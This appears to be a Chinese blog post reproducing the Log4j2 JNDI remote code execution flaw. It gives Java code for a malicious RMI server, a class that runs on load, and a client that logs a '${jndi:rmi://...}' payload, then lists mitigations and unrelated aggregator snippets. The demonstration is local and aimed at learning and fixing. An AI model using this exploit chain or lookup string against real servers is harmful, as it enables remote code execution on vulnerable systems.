liangbo7
liangbo7

log4j2远程代码执行漏洞复现

目录

描述:

代码复现:

执行结果:

漏洞解决方案:

描述:

       本次 Apache Log4j 远程代码执行漏洞,正是由于组件存在 Java JNDI 注入漏洞:当程序将用户输入的数据记入日志时,攻击者通过构造特殊请求,来触发 Apache Log4j2 中的远程代码执行漏洞,从而利用此漏洞在目标服务器上执行任意代码。

代码复现:

JDK: jdk1.8.0_191

开发工具:ideaIU-2018.3.6.win

远程代码下载服务器:nginx-1.20.0

项目结构

log4j2远程代码执行漏洞复现_第1张图片

 rmi-server:

log4j2远程代码执行漏洞复现_第2张图片




    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-client

    rmi-client
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
        
            org.apache.logging.log4j
            log4j-api
            2.14.0
        
        
            org.apache.logging.log4j
            log4j-core
            2.14.0
        
    



package com.lb.rmi.server;

import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RmiServer
{
   public static void main( String[] args ) throws Exception
    {
      String url = "http://127.0.0.1/";
      Registry createRegistry = LocateRegistry.createRegistry(10086);
      Reference r = new Reference("EviObj","com.lb.rmi.common.EviObj",url);
      System.out.println("start rmi server");
      com.sun.jndi.rmi.registry.ReferenceWrapper rw = new com.sun.jndi.rmi.registry.ReferenceWrapper(r);
      createRegistry.bind("evil", rw);
    }
}

rmi-common:

log4j2远程代码执行漏洞复现_第3张图片




    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-common

    rmi-common
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
    



package com.lb.rmi.common;

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.util.Hashtable;

public class EviObj implements ObjectFactory {

	static {
		System.out.println("侵入代码执行");
	}

	@Override
	public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) throws Exception {
		return null;
	}
}

rmi-client:

log4j2远程代码执行漏洞复现_第4张图片




    
        rmi
        lb
        1.0-SNAPSHOT
    
    4.0.0

    rmi-client

    rmi-client
    
    http://www.example.com

    
        UTF-8
        1.8
        1.8
    

    
        
            junit
            junit
            4.11
            test
        
        
            org.apache.logging.log4j
            log4j-api
            2.14.0
        
        
            org.apache.logging.log4j
            log4j-core
            2.14.0
        
    




package com.lb.rmi.client;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class RmiClient
{
	private static final Logger log = LogManager.getLogger();
	
    public static void main( String[] args ) throws Exception
    {
		//-Dcom.sun.jndi.rmi.object.trustURLCodebase=true -Dcom.sun.jndi.ldap.object.trustURLCodebase=true
		System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");
		System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
    	String info = "${jndi:rmi://localhost:10086/evil}";
       log.info(">>,{}",info);

    }
}

 远程代码下载服务器:把rmi-common侵入代码编译后拷贝到nginx资源目录下

log4j2远程代码执行漏洞复现_第5张图片

能访问下载即可

 

执行结果:

log4j2远程代码执行漏洞复现_第6张图片

漏洞解决方案:

1、临时缓解方案

  • 在jvm参数中添加 -Dlog4j2.FORMATMsgNoLookups=true
  • 系统环境变量中将FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS设置为true
  • 创建 "log4j2.component.properties" 文件,文件中增加配置 "log4j2.formatMsgNoLookups=true"

2、彻底修复方案

  • 手动删除log4j-core-*.jar中org/apache/logging/log4j/core/lookup/JndiLookup.class,重启服务即可。
  • 升级到官方提供的 log4j-2.15.0-rc2 版本

你可能感兴趣的:(安全)

  • 安全访问服务边缘(SASE):网络新时代的安全与连接解决方案 德迅云安全杨德俊 网络安全分布式
    随着信息技术的飞速发展,在企业纷纷拥抱数字业务的过程中,由于边缘计算、云服务、混合网络的逐渐兴起,使得本就漏洞百出的传统网络安全架构更加岌岌可危,企业和组织面临着日益复杂且多变的网络安全挑战。传统的网络安全解决方案往往难以应对这些挑战,而安全访问服务边缘(SASE)作为一种新型的网络安全模型,正逐渐受到业界的广泛关注和认可。下面我们就来简单了解下关于SASE的概念、特点、优势以及应用场景,对安全访
  • MongoDB常见的运维工具总结介绍 yuanpan mongodb运维数据库
    MongoDB提供了一些强大的运维工具,帮助管理员进行数据库监控、备份、恢复、性能优化等操作。以下是一些常见的MongoDB运维工具及其功能介绍:1.MongoDBAtlas功能:MongoDBAtlas是MongoDB官方的云托管数据库服务,它提供了全托管的MongoDB实例和自动化运维功能,包括自动备份、自动扩展、高可用性、监控和安全性等。它使得运维团队可以专注于应用开发,而无需担心数据库的管
  • 软件开发中的密码学(国密算法) 自己的九又四分之三站台 #软件架构师的“不归之路“密码学算法
    1.软件行业中的加解密在软件行业中,加解密技术广泛应用于数据保护、通信安全、身份验证等多个领域。加密(Encryption)是将明文数据转换为密文的过程,而解密(Decryption)则是将密文恢复为明文的过程。以下是加解密在软件行业中一些常见的应用和技术:1.1.对称加密与非对称加密对称加密:加密和解密使用相同的密钥。常见算法包括AES(高级加密标准)、DES(数据加密标准)、3DES(Trip
  • 【深度分析】DeepSeek 遭暴力破解,攻击 IP 均来自美国,造成影响有多大?有哪些好的防御措施? 精通代码大仙 深度分析新媒体运营创业创新
    技术铁幕下的暗战:当算力博弈演变为代码战争一场针对中国AI独角兽的全球首例国家级密码爆破,揭开了数字时代技术博弈的残酷真相。DeepSeek服务器日志中持续跳动的美国IP地址,不仅是网络攻击的地理坐标,更是技术霸权对新兴挑战者的精准绞杀。这场攻防战早已超越传统网络安全范畴,成为大国科技博弈的微观镜像。暴力破解的每一声警报都在叩击技术主权的边界。攻击波峰时每秒数万次的认证请求,实质是算力优势向网络安
  • Aquatronica Control System敏感信息泄露漏洞复现(附脚本) iSee857 漏洞复现安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。0x01产品描述:AquatronicaControlSystem是一款先进的水族箱自动化管理系统,专为水族爱好者设计。它通过集成多种传感器和控制模块
  • Elber Wayber 模拟/数字音频密码重置漏洞复现(附脚本) iSee857 漏洞复现安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。0x01产品描述:ElberWayber是一家专注于音频技术解决方案的公司,提供高质量的模拟和数字音频设备,广泛应用于专业录音、广播、现场演出和多媒体
  • 工业互联网:工控安全(非常详细)零基础入门到精通,收藏这一篇就够了 leah126 程序员渗透测试编程安全网络数据挖掘机器学习
    1.工业控制系统是什么?工业控制系统(IndustrialControlSystem,ICS)是一种集合了计算机技术、通信技术和控制技术的自动化控制系统,专门设计用于工业生产和关键基础设施的监控、管理和控制,以确保工业过程的高效、精确运行,包含多个组成部分:(1)监控和数据采集系统(SupervisoryControlandDataAcquisition,SCADA):用于远程监控地理分布广泛的工
  • PHP代码免费加密平台:保护你的代码安全 网友阿贵 PHPphp
    PHP代码免费加密平台:保护你的代码安全引言在开发过程中,保护源代码的安全性是非常重要的。PHP作为一种广泛使用的服务器端脚本语言,其代码的安全性尤为重要。为了帮助开发者更好地保护自己的代码,我们推出了PHP代码免费加密平台(php.javait.cn)。本文将详细介绍该平台的功能和使用方法。平台简介1.平台功能PHP代码免费加密平台提供了以下主要功能:PHP混淆加密:无需安装组件运行,兼容主流P
  • 2024年网安最新史上最全网络安全站点集合_网络安全漏洞网站 2401_84253850 程序员web安全安全
    http://www.7kb.org/(7kb论坛)http://lu4n.com/(lun博客)OD体育平台-首页(cnbiraid博客)http://blog.neargle.com(neargle博客)https://lightrains.org(lightrains博客)首页-imlonghao(imlonghao博客)ZeroKeeper(zerokeeper博客)http://www.
  • WordPress Web Directory Free插件本地包含漏洞复现(附脚本)(CVE-2024-3673) iSee857 安全web安全
    免责申明:本文所描述的漏洞及其复现步骤仅供网络安全研究与教育目的使用。任何人不得将本文提供的信息用于非法目的或未经授权的系统测试。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。0x01产品描述:WebDirectoryFree是一款用于WordPress的免费插件,主要用于创建和管理在线目录网站。它允许用户轻松地添加、管理和
  • 网络安全-网络安全及其防护措施11 Jr_l 网络安全安全网络安全网络
    51.网络容量规划网络容量规划的概念和重要性网络容量规划:是指根据业务需求和预期增长,合理规划和设计网络的带宽、设备和资源,以满足未来网络流量和服务质量的需求。通过有效的网络容量规划,确保网络性能稳定和用户体验良好,避免资源浪费和网络瓶颈。网络容量规划的关键因素业务需求预测:分析和预测业务增长趋势及数据流量变化,确定未来网络容量需求。带宽规划:根据业务需求和网络拓扑设计,规划合适的带宽和连接,确保
  • HTTPS协议简述 free-9d https网络协议http
    HTTPS协议简介HTTPS是HTTP+Security的组合,即在HTTP的基础上加入了安全性机制,主要通过加密传输、身份认证和数据完整性保护来确保通信的安全性。为了实现这一目标,HTTPS引入了加密技术,包括对称加密、非对称加密和数字证书机制。1.对称加密概念对称加密是一种加密方式,服务器和客户端共用一个密钥。信息通过密钥进行加密和解密,密钥本身也需要在双方之间传递。优点算法简单,效率高。缺陷
  • 多租户架构未提供足够的租户安全培训和教育 图幻未来 网络安全
    多租户架构下租户安全培训与教育的需求分析与解决方案引言随着云计算和大数据技术的飞速发展,多租户架构已成为企业数字化转型的重要基石。多租户架构允许一个应用程序实例为多个租户提供服务,从而降低了企业的运营成本。然而,这种架构也带来了一系列的安全挑战。为了解决这些问题,企业需要加强对租户的安全培训和教育,确保租户了解如何在使用多租户架构时保护自己的数据和应用程序。本文将探讨多租户架构下的租户安全培训和教
  • 17、智能驾驶硬件架构安全设计一般原则 OEM的牛马DRE 智能驾驶控制器硬件介绍人工智能
    这段文字详细描述了硬件安全架构设计的一系列要求和原则,涵盖了从基本设计原则到具体实现细节和验证要求:一、基本设计原则平衡冗余与复杂度:硬件安全架构需平衡硬件冗余设计和故障检测回路以提高容错能力,同时降低硬件复杂度以避免复杂接口和系统失效。二、硬件容错设计覆盖的故障类型内部器件故障:包括恒态和瞬态故障。外部接口故障:涉及数字IO、模拟AD、网络接口和其他总线接口。外部环境干扰:电压浮动、EMC、振动
  • 一文搞懂python的face_recognition人脸识别库 码上飞扬 python开发语言人脸识别
    随着人工智能和机器学习的快速发展,人脸识别技术在安全监控、身份验证、智能相册等领域的应用越来越广泛。Python作为一门简洁高效的编程语言,其丰富的库支持使得人脸识别的实现变得更加容易。本文将介绍如何使用Python的face_recognition库来实现基本的人脸识别功能。一、face_recognition库简介1.1什么是face_recognition库?face_recognition
  • go语言学习--处理map的无序输出 ???Sir 数据结构与算法
    最近工作中遇到了这样的一个场景,需要处理一个无限极分类的问题,对于数据结构的定义首先想到了,map,map[int]map[int]struct。通过两层map的定义归类parent_id和id的关系,然后有个递归进行数据的绑定处理。想想就开心,map确实好用,虽然不是并发安全,但是在查询速度和检查值存在方面确实有优势,然后就开心的写了起来,但是想起来map的输出是无序的。然后就想办法去处理数据的
  • 免费期货量化交易软件有哪些?各自有何特色和优势? 股票程序化交易接口 量化交易股票API接口Python股票量化交易免费期货量化交易软件特色股票量化接口股票API接口
    Python股票接口实现查询账户,提交订单,自动交易(1)Python股票程序交易接口查账,提交订单,自动交易(2)股票量化,Python炒股,CSDN交流社区>>>常见免费期货量化交易软件类型传统券商类软件附带功能一些传统券商提供的交易软件开始融入量化交易功能。这类软件的优势在于其安全性较高,毕竟依托于券商强大的资金和技术背景。它们在数据的准确性和及时性方面表现不错,因为券商本身就需要处理大量的
  • ADAS(高级驾驶辅助系统)硬件解决方案设计与应用 空间机器人 智能电视
    ADAS(高级驾驶辅助系统)硬件解决方案设计与应用让汽车变得聪明的魔法:硬件背后的秘密摘要随着智能驾驶技术的崛起,ADAS(高级驾驶辅助系统)已经成为现代汽车中不可或缺的“超级大脑”。这个系统通过结合多个传感器、强大的计算平台以及实时控制系统,帮助驾驶员安全、舒适地驾驶,甚至直接接管驾驶任务。本文将从硬件的角度,带你走进ADAS系统的“魔法世界”,通过生动的参数分析和实例,揭示背后的技术奥秘。引言
  • 农药数字监管平台 百态老人 人工智能
    农药数字监管平台是近年来农业信息化发展的重要组成部分,旨在通过数字化手段提升农药监管的效率和透明度,确保农药的合法合规使用,保障农产品质量安全和生态环境安全。以下从多个角度详细说明农药数字监管平台的功能、应用及推广情况:1.平台功能与特点农药数字监管平台通常具备以下功能模块:数据登记与追踪:记录农药生产、经营、使用等环节的信息,实现全程可追溯。例如,广西农药数字监管平台支持农药登记基础数据查询、农
  • Python交互式界面import acl后用Ctrl+D退出导致Docker容器中Anaconda虚拟环境崩溃core dump进而容器退出问题(用exit()没有问题)EOF信号 Dontla dockerlinuxpythondocker开发语言
    文章目录解释解释在Python交互式界面中,exit()和Ctrl+D(在Unix系统中)或Ctrl+Z(在Windows系统中)都是退出Python解释器的方法,但它们的工作机制是不同的:exit()是Python的内置函数,它会进行正常的清理工作,安全地关闭解释器。这个过程包括:调用已注册的清理函数释放资源正常终止Python进程而Ctrl+D则是发送一个EOF(EndOfFile)信号给进程
  • 聊聊Kotlin单例,从object单例,到带参数单例,论如何优雅的封装! weixin_33859844 移动开发
    一.序单例模式是我们在日常编程中,比较常用的设计模式。一个好的单例,必然需要满足唯一性和线程安全性。而Java中,关于单例的文章讲解已经很完善了,单例模式已经成为一种编程范式。在谷歌强推Kotlin的今天,不少人使用Kotlin时,还带着Java的编程思维,并没有有效的利用Kotlin的一些特性。如果还用Java的编程思想来写Kotlin的单例,会有种四不像的感觉。在Kotlin里,想要实现单例模
  • [如何在LangChain中实现安全集成:最佳实践与应对策略] dsndnwfk langchain安全数据库python
    如何在LangChain中实现安全集成:最佳实践与应对策略在现代应用开发过程中,安全集成是一个非常重要的环节。LangChain作为一个拥有广泛生态系统的库,支持与各种外部资源进行集成,如本地和远程文件系统、API和数据库。这些集成使开发人员能够创建结合LLM(大语言模型)强大功能和外部资源交互的多样化应用。然而,安全问题不容忽视。本文将深入探讨在LangChain应用中实现安全集成的最佳实践,并
  • Java/Kotlin单例懒汉式、饿汉式以及静态内部类 阿祥Ape java开发语言
    1、饿汉式特点:好处是没有线程安全的问题,坏处是浪费内存空间。Java>>publicclassSingleInstance1{privatestaticSingleInstance1instance;publicSingleInstance1getInstance(){if(instance==null){synchronized(SingleInstance1.class){if(instan
  • FortiOS 存在身份验证绕过导致命令执行漏洞(CVE-2024-55591) 缘梦未来 漏洞复现安全web安全
    免责声明:本文旨在提供有关特定漏洞的深入信息,帮助用户充分了解潜在的安全风险。发布此信息的目的在于提升网络安全意识和推动技术进步,未经授权访问系统、网络或应用程序,可能会导致法律责任或严重后果。因此,作者不对读者基于本文内容所采取的任何行为承担责任。读者在使用本文信息时,必须严格遵循适用的法律法规及服务协议,自行承担一切风险与责任。如涉及侵权,请及时与我们联系,我们将尽快处理并删除相关内容。0x0
  • 43-3 应急响应 - WebShell查杀工具 技术探索 Web安全攻防全解析web安全安全
    一、WebShell简介WebShell是一种以asp、php、jsp等网页文件形式存在的代码执行环境,通常用于网站管理、服务器管理和权限管理等操作。然而,如果被入侵者利用,它也可以用于控制网站服务器。具有完整功能的WebShell通常被称为"大马",而功能简单的则称为"小马"。WebShell的存在可能对网络安全构成威胁,因此在网络管理中应当严格加以防范。二、D盾D盾使用自行研发的代码分析引擎,
  • HiJobQueue:一个简单的线程安全任务队列 液态不合群 安全c++算法
    概述HiJobQueue是一个线程安全的任务队列,用于在多线程环境中管理和执行异步任务。它的设计参考了Cobalt项目中的JobQueue,并做了适当的简化。HiJobQueue提供了任务推送(push)、任务弹出(pop)、队列退出(quit)等功能,适用于需要异步任务调度的场景。核心功能1、线程安全:使用std::mutex和std::condition_variable实现线程安全的任务队列
  • Adobe软件隐藏功能大揭秘:5个冷门小技巧助你效率倍增 shelby_loo adobe
    作为设计师和创意工作者,我们对Adobe系列软件的强大功能一定不陌生。但你是否知道,通过申请Edu教育邮箱,学生和教师可以免费或以极低的价格订阅这些软件,享受专业的创作体验呢?这不仅能让你远离破解软件带来的不稳定和安全隐患,还能让你合法地使用正版软件,充分发挥创意。如果你还没有Edu邮箱,也不用担心。网上有很多关于如何申请Edu邮箱的教程和经验分享。你可以通过搜索引擎查找相关信息,或者参考一些知识
  • 使用AES CTR模式实现任意位置数据加解密 lxkj_2024 linux
    目录需求AES加密CTR模式计数器完整demo实现openssl命令行进行验证需求最近对我们的项目进行安全优化,我们的服务程序在使用过程中会持续接受客户端的一些数据并追加写到文件中,文件写入完毕后还支持客户端的随机访问来获取这些结构化信息。之前数据的写入都是明文方式,因此考虑使用最广泛使用的AES对称加密来进行处理,我们想到了两种方式进行:1)写入完毕后另起一个线程/进程读文件->加密->写文件-
  • 用Python做一个绝地求生压枪版 程序媛了了 python开发语言
    一、概述1.1效果总的来说,这种方式是通过图像识别来完成的,不侵入游戏,不读取内存,安全不被检测。1.2前置知识游戏中有各种不同的枪械,不同的枪械后坐力不一样,射速也不同。相同的枪械,装上不同的配件后,后坐力也会发生变化。枪械的y轴上移是固定的,x轴是随机的,因此我们程序只移动鼠标y轴。x轴游戏中手动操作。1.3实现原理简述通过python中的pynput模块监听键盘鼠标。监听鼠标左键按下,这个时
  • 密码技术应该怎么用第十五天 CissSimkey 算法密码学
    除了使用密码算法,还有以下多种方式可以保护数据:一、物理安全措施数据存储设备防护将数据存储在安全的物理位置,如数据中心。这些数据中心通常有严格的访问控制,包括门禁系统,只有经过授权的人员能够进入。例如,一些银行的数据中心采用多重身份验证的门禁,需要刷卡并且通过指纹识别或面部识别才能进入。使用专门的存储设备防护设施,像服务器机柜可以加锁,防止未经授权的人员直接接触存储数据的硬盘等设备。并且存储设备还
  • JAVA基础 灵静志远 位运算加载Date字符串池覆盖
    一、类的初始化顺序 1 (静态变量,静态代码块)-->(变量,初始化块)--> 构造器 同一括号里的,根据它们在程序中的顺序来决定。上面所述是同一类中。如果是继承的情况,那就在父类到子类交替初始化。 二、String 1 String a = "abc"; JAVA虚拟机首先在字符串池中查找是否已经存在了值为"abc"的对象,根
  • keepalived实现redis主从高可用 bylijinnan redis
    方案说明 两台机器(称为A和B),以统一的VIP对外提供服务 1.正常情况下,A和B都启动,B会把A的数据同步过来(B is slave of A) 2.当A挂了后,VIP漂移到B;B的keepalived 通知redis 执行:slaveof no one,由B提供服务 3.当A起来后,VIP不切换,仍在B上面;而A的keepalived 通知redis 执行slaveof B,开始
  • java文件操作大全 0624chenhong java
    最近在博客园看到一篇比较全面的文件操作文章,转过来留着。 http://www.cnblogs.com/zhuocheng/archive/2011/12/12/2285290.html 转自http://blog.sina.com.cn/s/blog_4a9f789a0100ik3p.html 一.获得控制台用户输入的信息    &nbs
  • android学习任务 不懂事的小屁孩 工作
    任务 完成情况 搞清楚带箭头的pupupwindows和不带的使用 已完成 熟练使用pupupwindows和alertdialog,并搞清楚两者的区别 已完成 熟练使用android的线程handler,并敲示例代码 进行中 了解游戏2048的流程,并完成其代码工作 进行中-差几个actionbar 研究一下android的动画效果,写一个实例 已完成 复习fragem
  • zoom.js 换个号韩国红果果 oom
    它的基于bootstrap 的 https://raw.github.com/twbs/bootstrap/master/js/transition.js  transition.js模块引用顺序 <link rel="stylesheet" href="style/zoom.css"> <script src=&q
  • 详解Oracle云操作系统Solaris 11.2 蓝儿唯美 Solaris
    当Oracle发布Solaris 11时,它将自己的操作系统称为第一个面向云的操作系统。Oracle在发布Solaris 11.2时继续它以云为中心的基调。但是,这些说法没有告诉我们为什么Solaris是配得上云的。幸好,我们不需要等太久。Solaris11.2有4个重要的技术可以在一个有效的云实现中发挥重要作用:OpenStack、内核域、统一存档(UA)和弹性虚拟交换(EVS)。 
  • spring学习——springmvc(一) a-john springMVC
    Spring MVC基于模型-视图-控制器(Model-View-Controller,MVC)实现,能够帮助我们构建像Spring框架那样灵活和松耦合的Web应用程序。   1,跟踪Spring MVC的请求 请求的第一站是Spring的DispatcherServlet。与大多数基于Java的Web框架一样,Spring MVC所有的请求都会通过一个前端控制器Servlet。前
  • hdu4342 History repeat itself-------多校联合五 aijuans 数论
    水题就不多说什么了。 #include<iostream>#include<cstdlib>#include<stdio.h>#define ll __int64using namespace std;int main(){ int t; ll n; scanf("%d",&t); while(t--)
  • EJB和javabean的区别 asia007 beanejb
    EJB不是一般的JavaBean,EJB是企业级JavaBean,EJB一共分为3种,实体Bean,消息Bean,会话Bean,书写EJB是需要遵循一定的规范的,具体规范你可以参考相关的资料.另外,要运行EJB,你需要相应的EJB容器,比如Weblogic,Jboss等,而JavaBean不需要,只需要安装Tomcat就可以了   1.EJB用于服务端应用开发, 而JavaBeans
  • Struts的action和Result总结 百合不是茶 strutsAction配置Result配置
        一:Action的配置详解:      下面是一个Struts中一个空的Struts.xml的配置文件     <?xml version="1.0" encoding="UTF-8" ?> <!DOCTYPE struts PUBLIC &quo
  • 如何带好自已的团队 bijian1013 项目管理团队管理团队
    在网上看到博客" 怎么才能让团队成员好好干活"的评论,觉得写的比较好。 原文如下: 我做团队管理有几年了吧,我和你分享一下我认为带好团队的几点: 1.诚信         对团队内成员,无论是技术研究、交流、问题探讨,要尽可能的保持一种诚信的态度,用心去做好,你的团队会感觉得到。 2.努力提
  • Java代码混淆工具 sunjing ProGuard
    Open Source Obfuscators ProGuard http://java-source.net/open-source/obfuscators/proguardProGuard is a free Java class file shrinker and obfuscator. It can detect and remove unused classes, fields, m
  • 【Redis三】基于Redis sentinel的自动failover主从复制 bit1129 redis
    在第二篇中使用2.8.17搭建了主从复制,但是它存在Master单点问题,为了解决这个问题,Redis从2.6开始引入sentinel,用于监控和管理Redis的主从复制环境,进行自动failover,即Master挂了后,sentinel自动从从服务器选出一个Master使主从复制集群仍然可以工作,如果Master醒来再次加入集群,只能以从服务器的形式工作。   什么是Sentine
  • 使用代理实现Hibernate Dao层自动事务 白糖_ DAOspringAOP框架Hibernate
    都说spring利用AOP实现自动事务处理机制非常好,但在只有hibernate这个框架情况下,我们开启session、管理事务就往往很麻烦。 public void save(Object obj){ Session session = this.getSession(); Transaction tran = session.beginTransaction(); try
  • maven3实战读书笔记 braveCS maven3
    Maven简介 是什么? Is a software project management and comprehension tool.项目管理工具 是基于POM概念(工程对象模型) [设计重复、编码重复、文档重复、构建重复,maven最大化消除了构建的重复] [与XP:简单、交流与反馈;测试驱动开发、十分钟构建、持续集成、富有信息的工作区]     功能:
  • 编程之美-子数组的最大乘积 bylijinnan 编程之美
    public class MaxProduct { /** * 编程之美 子数组的最大乘积 * 题目: 给定一个长度为N的整数数组,只允许使用乘法,不能用除法,计算任意N-1个数的组合中乘积中最大的一组,并写出算法的时间复杂度。 * 以下程序对应书上两种方法,求得“乘积中最大的一组”的乘积——都是有溢出的可能的。 * 但按题目的意思,是要求得这个子数组,而不
  • 读书笔记-2 chengxuyuancsdn 读书笔记
    1、反射 2、oracle年-月-日 时-分-秒 3、oracle创建有参、无参函数 4、oracle行转列 5、Struts2拦截器 6、Filter过滤器(web.xml) 1、反射 (1)检查类的结构 在java.lang.reflect包里有3个类Field,Method,Constructor分别用于描述类的域、方法和构造器。 2、oracle年月日时分秒 s
  • [求学与房地产]慎重选择IT培训学校 comsci it
          关于培训学校的教学和教师的问题,我们就不讨论了,我主要关心的是这个问题       培训学校的教学楼和宿舍的环境和稳定性问题       我们大家都知道,房子是一个比较昂贵的东西,特别是那种能够当教室的房子... &nb
  • RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 daizj oraclermanfilespersetPARALLELISM
    RMAN配置中通道(CHANNEL)相关参数 PARALLELISM 、FILESPERSET的关系 转 PARALLELISM --- 我们还可以通过parallelism参数来指定同时"自动"创建多少个通道: RMAN > configure device type disk parallelism 3 ; 表示启动三个通道,可以加快备份恢复的速度。
  • 简单排序:冒泡排序 dieslrae 冒泡排序
    public void bubbleSort(int[] array){ for(int i=1;i<array.length;i++){ for(int k=0;k<array.length-i;k++){ if(array[k] > array[k+1]){
  • 初二上学期难记单词三 dcj3sjt126com sciet
    concert 音乐会 tonight 今晚 famous 有名的;著名的 song 歌曲 thousand 千 accident 事故;灾难 careless 粗心的,大意的 break 折断;断裂;破碎 heart 心(脏) happen  偶尔发生,碰巧 tourist 旅游者;观光者 science (自然)科学 marry 结婚 subject 题目;
  • I.安装Memcahce 1. 安装依赖包libevent Memcache需要安装libevent,所以安装前可能需要执行 Shell代码 收藏代码 dcj3sjt126com redis
    wget http://download.redis.io/redis-stable.tar.gz tar xvzf redis-stable.tar.gz cd redis-stable make   前面3步应该没有问题,主要的问题是执行make的时候,出现了异常。 异常一: make[2]: cc: Command not found 异常原因:没有安装g
  • 并发容器 shuizhaosi888 并发容器
       通过并发容器来改善同步容器的性能,同步容器将所有对容器状态的访问都串行化,来实现线程安全,这种方式严重降低并发性,当多个线程访问时,吞吐量严重降低。    并发容器ConcurrentHashMap       替代同步基于散列的Map,通过Lock控制。   &nb
  • Spring Security(12)——Remember-Me功能 234390216 Spring SecurityRemember Me记住我
    Remember-Me功能   目录   1.1     概述 1.2     基于简单加密token的方法 1.3     基于持久化token的方法 1.4     Remember-Me相关接口和实现
  • 位运算 焦志广 位运算
    一、位运算符C语言提供了六种位运算符: & 按位与 | 按位或 ^ 按位异或 ~ 取反 << 左移 >> 右移 1. 按位与运算 按位与运算符"&"是双目运算符。其功能是参与运算的两数各对应的二进位相与。只有对应的两个二进位均为1时,结果位才为1 ,否则为0。参与运算的数以补码方式出现。 例如:9&am
  • nodejs 数据库连接 mongodb mysql liguangsong mongodbmysqlnode数据库连接
    1.mysql 连接    package.json中dependencies加入     "mysql":"~2.7.0"    执行 npm install      在config 下创建文件 database.js    
  • java动态编译 olive6615 javaHotSpotjvm动态编译
        在HotSpot虚拟机中,有两个技术是至关重要的,即动态编译(Dynamic compilation)和Profiling。     HotSpot是如何动态编译Javad的bytecode呢?Java bytecode是以解释方式被load到虚拟机的。HotSpot里有一个运行监视器,即Profile Monitor,专门监视
  • Storm0.9.5的集群部署配置优化 roadrunners 优化storm.yaml
    nimbus结点配置(storm.yaml)信息: # Licensed to the Apache Software Foundation (ASF) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional inf
  • 101个MySQL 的调节和优化的提示 tomcat_oracle mysql
     1. 拥有足够的物理内存来把整个InnoDB文件加载到内存中——在内存中访问文件时的速度要比在硬盘中访问时快的多。   2. 不惜一切代价避免使用Swap交换分区 – 交换时是从硬盘读取的,它的速度很慢。   3. 使用电池供电的RAM(注:RAM即随机存储器)。   4. 使用高级的RAID(注:Redundant Arrays of Inexpensive Disks,即磁盘阵列
  • zoj 3829 Known Notation(贪心) 阿尔萨斯 ZOJ
    题目链接:zoj 3829 Known Notation 题目大意:给定一个不完整的后缀表达式,要求有2种不同操作,用尽量少的操作使得表达式完整。 解题思路:贪心,数字的个数要要保证比∗的个数多1,不够的话优先补在开头是最优的。然后遍历一遍字符串,碰到数字+1,碰到∗-1,保证数字的个数大于等1,如果不够减的话,可以和最后面的一个数字交换位置(用栈维护十分方便),因为添加和交换代价都是1
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他